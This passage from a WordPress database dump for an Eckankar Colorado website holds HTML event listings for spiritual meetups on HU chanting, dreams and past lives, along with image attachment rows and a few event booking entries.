target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Power of Grace','','publish','closed','closed','','the-power-of-grace-2','','','2023-10-25 14:39:14','2023-10-25 20:39:14','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269262',0,'mec-events','',0),(269264,2,'2023-10-25 14:28:37','2023-10-25 20:28:37','','waterfall-illus-2','','inherit','closed','closed','','waterfall-illus-2','','','2023-10-25 14:28:37','2023-10-25 20:28:37','',269262,'https://eckankar-colorado.org/wp-content/uploads/2023/10/waterfall-illus-2.jpg',0,'attachment','image/jpeg',0),(269265,2,'2023-10-25 14:44:50','2023-10-25 20:44:50','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<strong><span style=\"font-size: 14pt;\">\"Do one thing each day for love alone. Don\'t expect any kind of reward.\"</span></strong><br>\r\n<span style=\"font-size: 12pt;\"><em>Stories to Help You See God In Your Life: The Book of ECK Parables</em>, Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Write the Screenplay of Your Life As a Love Story that Matters','','publish','closed','closed','','write-the-screenplay-of-your-life-as-a-love-story-that-matters-2','','','2023-10-25 14:48:41','2023-10-25 20:48:41','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269265',0,'mec-events','',0),(269266,2,'2023-10-25 14:44:28','2023-10-25 20:44:28','','sunset-sea-2','','inherit','closed','closed','','sunset-sea-2','','','2023-10-25 14:44:28','2023-10-25 20:44:28','',269265,'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-sea-2.jpg',0,'attachment','image/jpeg',0),(269268,2,'2023-10-25 14:55:03','2023-10-25 20:55:03','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Go higher, further, deeper on your path of spiritual self-discovery!<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Let your own unique talents and interests create a pathway of discovery that leads to your highest destiny as Soul! Become a creative expression of divine love, serving all life with gratitude and joy.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">\"The purpose of life is to become a Coworker with God. It means service to others, using our talents and interests to give hand, ear, or heart to another in need.\" --Harold Klemp, Past Lives, Dreams and Soul Travel, p. 17.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are invited to attend this interactive discussion, during which we will be utilizing the tools, exercises, techniques, stories, and inspiration in the ‘<a href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\">Finding Your Life’s Purpose</a>‘ e-booklet </span><span style=\"font-size: 14pt;\">available for free online.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/296651140/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Life\'s Purpose','','publish','closed','closed','','lifes-purpose','','','2023-10-25 14:56:19','2023-10-25 20:56:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269268',0,'mec-events','',0),(269269,2,'2023-10-25 14:54:06','2023-10-25 20:54:06','','birds-chain-3','','inherit','closed','closed','','birds-chain-3','','','2023-10-25 14:54:06','2023-10-25 20:54:06','',269268,'https://eckankar-colorado.org/wp-content/uploads/2023/10/birds-chain-3.jpg',0,'attachment','image/jpeg',0),(269386,2,'2023-11-15 10:44:31','0000-00-00 00:00:00','','Auto Draft','','auto-draft','closed','closed','','','','','2023-11-15 10:44:31','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?p=269386',0,'post','',0),(269272,2,'2023-10-27 09:16:00','2023-10-27 15:16:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The most important point of all is that you are Soul. Know that you are a spark of God and can exist fully only within the realization of that profound truth. As such, you are a light and inspiration to others.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Watch Sri Harold Klemp’s Saturday evening talk at the 2023 ECK Soul Adventure Seminar, which was held October 20 - 22 in Minneapolis, Minnesota. Then join us for fellowship and seminar highlight sharing from those that attended. This will be an in person event only.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>','Video Rebroadcast - Sri Harold Klemp','','publish','closed','closed','','video-rebroadcast-in-personsri-harold-klemp-at-the-2022-eck-soul-adventure-seminar-3','','','2023-11-02 21:03:46','2023-11-03 03:03:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269272',0,'mec-events','',0),(268705,2,'2023-06-26 14:29:46','2023-06-26 20:29:46','','sa-events-img-3sm','','inherit','closed','closed','','sa-events-img-3sm','','','2023-06-26 14:29:46','2023-06-26 20:29:46','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/02/sa-events-img-3sm.jpg',0,'attachment','image/jpeg',0),(269082,2,'2023-09-18 10:45:46','2023-09-18 16:45:46','','web-promo-bk-5','','inherit','closed','closed','','web-promo-bk-5','','','2023-09-18 10:45:46','2023-09-18 16:45:46','',269010,'https://eckankar-colorado.org/wp-content/uploads/2023/09/web-promo-bk-5.jpg',0,'attachment','image/jpeg',0),(268737,2,'2023-06-30 10:10:40','2023-06-30 16:10:40','','2023-Reg-SA-1','','inherit','closed','closed','','2023-reg-sa-1','','','2023-06-30 11:05:11','2023-06-30 17:05:11','',268736,'https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-Reg-SA-1.jpg',0,'attachment','image/jpeg',0),(268742,2,'2023-06-30 11:14:29','2023-06-30 17:14:29','','2023-Reg-SA-5','','inherit','closed','closed','','2023-reg-sa-5','','','2023-06-30 11:14:29','2023-06-30 17:14:29','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-Reg-SA-5.jpg',0,'attachment','image/jpeg',0),(268743,2,'2023-06-30 11:32:39','2023-06-30 17:32:39','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a <strong>HU</strong> Song from 9:45 - 10:15 a.m.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Growth Means Change','','publish','closed','closed','','spiritual-growth-means-change','','','2023-06-30 11:33:17','2023-06-30 17:33:17','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268743',0,'mec-events','',0),(268744,2,'2023-06-30 11:31:54','2023-06-30 17:31:54','','flowers-on-swing','','inherit','closed','closed','','flowers-on-swing','','','2023-06-30 11:31:54','2023-06-30 17:31:54','',268743,'https://eckankar-colorado.org/wp-content/uploads/2023/06/flowers-on-swing.jpg',0,'attachment','image/jpeg',0),(268747,2,'2023-06-30 13:56:00','2023-06-30 19:56:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt;\">If you’re ready to explore a new way of looking at change, then this is for you.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 15pt;\">The <strong>Colorado Springs ECK Center</strong> will be live-streaming the upcoming \'ECK Light and Sound Service\'. The program will be shown on a large TV for all to enjoy. You are warmly invited to join us for this in person event.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">Would you like to learn how to embrace change?<br>\r\n</span><span style=\"font-size: 14pt;\">Are you ready to go to the next level spiritually?<br>\r\n</span><span style=\"font-size: 14pt;\">Do you want to see the blessings in your life more clearly?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book Our Spiritual Wake-Up Calls, p. 126,</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\"> \"When people don’t understand that a change is for their own good, they usually shut the door to the blessings of God – just because it is change.\"</span></strong></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Growth Means Change','','publish','closed','closed','','spiritual-growth-means-change-live-stream','','','2023-06-30 14:12:50','2023-06-30 20:12:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268747',0,'mec-events','',0),(268748,2,'2023-06-30 14:02:44','2023-06-30 20:02:44','','bridge-2','','inherit','closed','closed','','bridge-2','','','2023-06-30 14:02:44','2023-06-30 20:02:44','',268747,'https://eckankar-colorado.org/wp-content/uploads/2023/06/bridge-2.jpg',0,'attachment','image/jpeg',0),(268792,0,'2023-07-11 16:22:18','2023-07-11 22:22:18','','','','publish','closed','closed','','268792','','','2023-07-11 16:22:18','2023-07-11 22:22:18','',0,'https://eckankar-colorado.org/nf_sub/268792/',0,'nf_sub','',0),(268793,0,'2023-07-13 14:55:03','2023-07-13 20:55:03','','','','publish','closed','closed','','268793','','','2023-07-13 14:55:03','2023-07-13 20:55:03','',0,'https://eckankar-colorado.org/nf_sub/268793/',0,'nf_sub','',0),(268752,2,'2023-06-30 16:10:22','2023-06-30 22:10:22','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Easy Ways to Connect with Spirit Everyday.<br>\r\n</span></strong></span><span style=\"font-size: 14pt;\">You are welcome to join us in person to Experience HU, the Sound of Soul, a mantra that will uplift your consciousness. <br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">HU is an ancient name for God, a sacred sound that has been sung for thousands of years in many lands for spiritual unfoldment. HU can uplift people of any religion, culture, or walk of life. </span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">This event will include an introduction, singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by a discussion where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">At this <strong>In Person</strong> event, you will have the opportunity to experience some of the many benefits of singing <strong>HU</strong> yourself:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Develop a Powerful Spiritual Practice','','publish','closed','closed','','develop-a-powerful-spiritual-practice-2','','','2023-06-30 16:13:30','2023-06-30 22:13:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268752',0,'mec-events','',0),(268753,2,'2023-06-30 18:12:54','2023-07-01 00:12:54','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt;\"><strong>Learn from your past to improve your now!</strong></span></p>\r\n<span class=\"\" style=\"font-size: 14pt;\">Discover how Past Lives, Dreams, and Soul Travel can help you gain valuable insights to improve the quality of your life every day!</span><span style=\"font-size: 14pt;\"> <br>\r\n</span>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: 0px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“As Soul—a divine spark of God—you are the eternal dreamer. You are the creator of your own worlds. You gain lessons in life and in your dreams. Each moment is an opportunity to gain trust in the Divine and faith in your own abilities.</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, The Spiritual Leader of Eckankar<br>\r\n</span></p>\r\n</blockquote>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Explore how dreams and Soul Travel are a source of inner truth and wisdom</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Find out how God speaks through everyday events and people.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Learn how to solve problems by tapping into the Supreme Creative Force.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is the first of three standalone, free spiritual explorations of ‘Past Lives, Dreams, and Soul Travel’ being held online; you may join by phone or Zoom video conference call.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The topics for this session are<strong> Past Lives</strong>, <strong>Heaven</strong>, and <strong>Soul\'s Destiny</strong>. </span><span style=\"font-size: 14pt;\">We will focus on the following:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Karma teaches divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Reincarnation awakens Soul to Its destiny</span></li>\r\n	<li><span style=\"font-size: 14pt;\">You can visit heaven</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Online event!</span></p>\r\n<br>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofcs/events/294305633/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Life Recall for a Better Today','','publish','closed','closed','','past-life-recall-for-a-better-today','','','2023-06-30 18:26:41','2023-07-01 00:26:41','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268753',0,'mec-events','',0),(268755,2,'2023-06-30 18:26:32','2023-07-01 00:26:32','','ancient-ruins-2','','inherit','closed','closed','','ancient-ruins-2','','','2023-06-30 18:26:32','2023-07-01 00:26:32','',268753,'https://eckankar-colorado.org/wp-content/uploads/2023/06/ancient-ruins-2.jpg',0,'attachment','image/jpeg',0),(269146,2,'2023-10-02 14:11:23','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">Friday thru Sunday -- October 6 - 8<br>\r\n</span><span style=\"font-size: 14pt;\">At the Colorado Springs Event Center </span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">Colorado Springs, CO</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Eckankar Booth at (Spiritual Fairs and Expos-- ADD TITLE OF FAIR OR EXPO) TEMPLATE','','draft','closed','closed','','','','','2023-10-02 14:11:23','2023-10-02 20:11:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269146',0,'mec-events','',0),(268784,1000024,'2023-07-09 10:30:00','2023-07-09 16:30:00','','Roger Morandi - rmorandi@comcast.net','','publish','closed','closed','','roger-morandi-rmorandicomcast-net-5','','','2023-07-09 10:30:00','2023-07-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268784',0,'mec-books','',0),(268783,1000047,'2023-07-09 10:30:00','2023-07-09 16:30:00','','Beth - beth1848@yahoo.com','','publish','closed','closed','','beth-beth1848yahoo-com-3','','','2023-07-09 10:30:00','2023-07-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268783',0,'mec-books','',0),(268759,15,'2023-07-01 10:05:32','2023-07-01 16:05:32','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">A Spiritual View of Dreams</span></strong></span></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Discover the secrets of your dreams and unlock a spiritual perspective on life in this open discussion group.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome to join us in a 6-month spiritual discussion on past lives, dreams, and soul travel. We will meet on the 2nd Wednesday of the month at 6:30pm at the Parker Public Library. Free books will be available and there is no need to have the books ahead of time. You can join one of the classes or all of them.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The plan is to focus on a different aspect of these topics each month:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">May 10 - You Have Lived Before - Remembering Past Lives</span><br>\r\n<span style=\"font-size: 14pt;\">June 14 - Past Lives, Present Lessons</span><br>\r\n<span style=\"font-size: 14pt;\">July 12 - Your Source for Everyday Guidance: A Spiritual View of Dreams</span><br>\r\n<span style=\"font-size: 14pt;\">August 9 - Gaining Insights through Spiritual Dream Exploration</span><br>\r\n<span style=\"font-size: 14pt;\">September 13 - Soul Travel: Learn to Shift Your Consciousness for a Better Life</span><br>\r\n<span style=\"font-size: 14pt;\">October 11 - Beyond Soul Travel: Being, Knowing, and Seeing</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/294531425/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Your Source for Everyday Guidance','','publish','closed','closed','','your-source-for-everyday-guidance','','','2023-07-01 10:14:40','2023-07-01 16:14:40','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268759',0,'mec-events','',0),(268760,15,'2023-07-01 10:04:52','2023-07-01 16:04:52','','Dreams','','inherit','closed','closed','','dreams-3','','','2023-07-01 10:04:52','2023-07-01 16:04:52','',268759,'https://eckankar-colorado.org/wp-content/uploads/2023/07/Dreams.webp',0,'attachment','image/webp',0),(268762,15,'2023-07-01 10:13:26','2023-07-01 16:13:26','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 18pt;\">Tune Into The Sound Current with HU</span><br>\r\n</span></strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of </span><span style=\"font-size: 14pt;\">yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/294487206/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Awaken To Higher Consciousness','','publish','closed','closed','','awaken-to-higher-consciousness','','','2023-07-01 10:16:46','2023-07-01 16:16:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268762',0,'mec-events','',0),(268765,15,'2023-07-01 10:26:23','2023-07-01 16:26:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Life Always Takes us Forward if We Will Go</span></strong></span></span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>\"</strong><strong>L</strong><strong>ife always takes us forward if we will go.</strong><strong>\"</strong>—Harold Klemp,&nbsp;<em>The Spiritual Life</em>, p. 12</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Our stressed out, hyper-wired culture, places ever-increasing demands on us — taking a tremendous toll on our health, relationships, work, and well-being.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The Mindfulness movement offers practices that can address many of these concerns, at a certain level. But there is always another step.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Soulfulness goes beyond the body, emotions,&nbsp;<em>and</em>&nbsp;the mind. It can resolve issues at a deeper level. Once you know yourself as Soul, your whole world changes. You can see everything from a higher point of view. You will come to know who you are and why you\'re here.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Being awake to the spiritual, inner side of life is the key to understanding the secrets of the universe. And the key to understanding your own life.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>\"</strong><strong>Life is a mystery until we come to the path of ECK (Divine Spirit) and begin to understand that we can be the creators of our own world. Soul can create whatever it needs.</strong><strong>\"</strong>&nbsp;—Harold Klemp,&nbsp;<em>The Awakening Soul,</em>&nbsp;pp. 14-15</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Look for us in the hotel lobby with the Meetup sign. We are often seated in the back of the room.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div 